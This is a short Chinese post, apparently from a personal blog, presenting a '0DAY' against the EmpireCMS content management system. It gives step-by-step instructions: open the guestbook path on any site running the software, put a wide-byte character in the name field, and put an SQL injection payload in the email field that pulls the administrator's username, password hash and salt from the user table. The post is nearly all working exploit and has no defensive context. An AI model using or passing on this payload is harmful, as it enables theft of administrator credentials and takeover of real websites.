帝国CMS网站程序0DAY:找到使用帝国CMS的站,网址后面直接加:
e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:
縗
联系邮箱处写:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
via:amxking
个人的碎碎念收集箱
分类
标签